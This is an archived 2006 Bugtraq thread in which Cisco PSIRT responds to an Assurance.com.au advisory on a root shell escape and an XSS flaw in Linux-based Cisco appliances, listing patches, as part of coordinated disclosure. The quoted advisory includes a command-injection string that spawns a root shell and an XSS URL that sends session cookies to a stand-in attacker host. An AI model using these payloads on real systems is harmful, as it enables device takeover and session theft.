lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <44465A7A.4030604@cisco.com>
Date: Wed, 19 Apr 2006 17:42:50 +0200
From: Ilker Temir <itemir@...co.com>
To: "assurance.com.au" <advisories+cisco200604@...urance.com.au>
Cc: bugtraq@...urityfocus.com, psirt@...co.com
Subject: Re: Multiple vulnerabilities in Linux based Cisco products


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

This is Cisco PSIRT's response to the privilege escalation
vulnerability independently announced by Adam Pointon of
Assurance.com.au and Mathieu Pepin of Axen Consulting. We would like
to thank both Adam and Mathieu for bringing this issue to our
attention.

The following are affected by this vulnerability:

  * Cisco Wireless LAN Solution Engine (WLSE)
  * Cisco Hosting Solution Engine (HSE)
  * Cisco User Registration Tool (URT)
  * Cisco Ethernet Subscriber Solution Engine (ESSE)
  * CiscoWorks2000 Service Management Solution (SMS)

By exploiting this vulnerability, an authenticated attacker on the
command line interface may obtain shell access to the underlying
operating system by injecting specially crafted commands.

The following products are affected by this vulnerability:

  * Cisco WLSE - A separate Cisco Security Advisory has been
    published which addresses multiple vulnerabilities in the WLSE
    appliance, including this vulnerability. Refer to the security
    advisory at the following URL for more information on the impact
    and fixed software versions:
    http://www.cisco.com/warp/public/707/cisco-sa-20060419-wlse.shtml.

  * This vulnerability is addressed by the Cisco bug ID CSCsd22861
    for the URT appliance. 2.5.5(A1) version of the URT software
    fixes this issue and can be downloaded from the following URL:
    http://www.cisco.com/cgi-bin/tablebuild.pl/urt-3des.

  * Cisco HSE - This vulnerability is addressed by the Cisco bug ID
    CSCsd22859 for the HSE appliance.
    The HSE-PSIRT1 patch fixes this issue and can be downloaded from
    the following URL:
    http://www.cisco.com/cgi-bin/tablebuild.pl/1105-host-sol.

  * Cisco ESSE - This product has reached End-of-Life therefore Cisco
    will not be providing fixed software for the ESSE product by
    default. Customers who require a fix for this should open a
    service request and request a fix through the Technical Support
    organization.

  * CiscoWorks SMS - This product has reached End-of-Life therefore
    Cisco will not be providing fixed software for the SMS product by
    default. Customers who require a fix for this should open a
    service request and request a fix through the Technical Support
    organization.

Thanks,

Ilker

assurance.com.au wrote:
> Assurance.com.au - Vulnerability Advisory
> -----------------------------------------------
> Release Date:
>  19-Apr-2006
> 
> Software:
>  Cisco Wireless Lan Solution Engine (WLSE)
>  Cisco Hosting Solution Engine (HSE)
>  Cisco Ethernet Subscriber Solution Engine (ESSE) 
>  Cisco User Registration Tool (URT)
>  CiscoWorks2000 Service Management Solution (SMS) 
>  Cisco Vlan Policy Server (VPS)
>  Cisco Management Engine (ME1100 Series)
>  CiscoWorks Service Level Manager (SLM)
> 
> 
> Vulnerabilities discovered:
> 
>  (1) A Vulnerability in the CiscoWorks WLSE "show" CLI application allows
>      execution of arbitrary code as the root user. 
> 
>  (2) Cross-site scripting flaw allows session theft
> 
> Vulnerability impact of each:
> 
>  (1) Medium - An authenticated user can gain root access to the Linux based 
>               system
> 
>  (2) Low - A targeted attack could lead to session theft and administrator
>            compromise
> 
> Vulnerability information
> 
>  (1) The Cisco shell presents the administrator with a restricted set of 
>      commands which includes a "show" application. The "show" application has
>      several vulnerabilities which allow an attacker to "break out" of the 
>      shell and execute commands (including /bin/sh) as the root user.
> 
>      This "show" application has been in use on this Linux-based platform 
>      build since 1999 and exists on several other Linux-based Cisco products.
> 
>  Example:
>   An Administrator is logged into the Cisco WLSE via either Telnet or SSH.
> 
>   admin@...e: show version
>    (C) Copyright 2005 by Cisco Systems Inc.
>    WLSE 1130 Release 2.11FCS Thu Apr 14 00:09:56 UTC 2005
>    Device Limit = 2550
>    Build Version (67) Tue Mar 15 18:13:02 UTC 2005
>    Uptime: 2 days 3 hours 32 mins
>    Linux version 2.4.28-5_WLSEsmp (root@...20.cisco.com) (gcc version 2.96 20000731
>    (Red Hat Linux 7.3 2.96-113)) #1 SMP Mon Jan 31 16:04:20 PST 2005
>    1130
>    Intel(R) CPU at  3065.897 Mhz with 3105924K bytes of memory.
> 
>   admin@...e: show syslog include ";/bin/sh -i;"
> 
>   sh-2.05a# id
>    uid=0(root) gid=502(admin) groups=502(admin),500(enable)
> 
>   At this point the administrator has root level access to the Linux-based
>   Cisco device.
> 
>  (2) A cross-site scripting flaw exists in:
>       /wlse/configure/archive/archiveApplyDisplay.jsp
>     with the "displayMsg" parameter. This can be used to steal the JSP session
>     cookie, therefore giving a targeted attacker admin level access to the 
>     system.  Once the attacker has admin web GUI access to the system via the 
>     XSS, they can then change the admin password or create a new admin user 
>     (without requiring the admin password).
>     
>     The attacker can then use the aforementioned "show cli" local root 
>     vulnerability to gain complete control of the Cisco Linux-Based system.
>     
>     As with (1) above Telnet or SSH access is required to login with the 
>     newly created user with admin level access in order to exploit the 
>     "show cli" bug.
> 
>   Example:
>    http://cisco-wlse.example.org/wlse/configure/archive/ \
>    archiveApplyDisplay.jsp?displayMsg=<script>document.location='http:// \
>    attacker.example.org?'+document.cookie</script>
>  
>   The cookie posted to attacker.example.org includes the JSESSIONID token:
>    ORIG_URL=cisco-wlse.example.org; browser_tzoffset=-660; \
>    JSESSIONID=johjehk2h1; \
>    HSE_TKT=admin:1133234898:17e5187e228ab1546ac26ef4ecacf689
> 
>   When combined with vulnerability (1), it allows a targeted attacker to gain
>   root access to the linux system.  
> 
> Solution:
>  Cisco has released patches for the vulnerabilities.
> 
> References:
>  Assurance.com.au advisory
>  http://www.assurance.com.au/advisories/200604-cisco.txt
> 
>  Cisco advisory note:
>  http://www.cisco.com/warp/public/707/cisco-sa-20060419-wlse.shtml
>  
>  Cisco security response:
>  http://www.cisco.com/warp/public/707/cisco-sr-20060419-priv.shtml
> 
> Credit:
>  Adam Pointon of Assurance.com.au
>  http://www.assurance.com.au/
> 
> Disclosure timeline:
>  30-Dec-2005 - Discovered during configuration for a customer
>  29-Jan-2006 - Email sent to psirt[at]cisco.com with full technical details
>  31-Jan-2006 - Response received from Cisco psirt
>  01-Feb-2006 - Cisco advises bug reports have been opened for both issues
>  05-Apr-2006 - Cisco releases patches to Assurance.com.au for testing
>  19-Apr-2006 - Advisory released
> 
> About us:
> Assurance.com.au is a specialised information security consultancy. 
> Our mission is to help organisations identify and secure information 
> assets. Our expertise concentrates in security architecture, managed 
> security and professional services in security testing/review and 
> compliance. 
> 
> Supporting this approach are services in the following areas: 
> 
> * Compliance Services - Penetration testing, security reviews, 
> compliance and audit services 
> 
> * Wireless and mobility solutions - design, installation and 
> management of IEEE 802.11a/b/g (WiFi), tele-mobility and other 
> wireless solutions 
> 
> * UNIX-like systems, networks and security advice and consulting 
> 
> Assurance consults to a wide array of organisations; small companies
> to large enterprise, utilities and government departments and 
> agencies. Its security professionals are respected as being amongst 
> the best in Australia and are quoted regularly in media. Assurance is 
> one of the few security organizations based in Australia actively 
> conducting vulnerability research resulting in public security 
> advisories. 
> 
> Assurance's experience, expertise and vendor-neutral focus ensures 
> we are able to assess and objectively recommend appropriate solutions.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (GNU/Linux)

iD8DBQFERlp68/wE0ppYtwURAsGVAJ0ZCLnG6j0K9fOagHs/APk9jb64OwCfRn8d
91ifPoI0A6D+JYwTXQIEHh4=
=kYyG
-----END PGP SIGNATURE-----


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ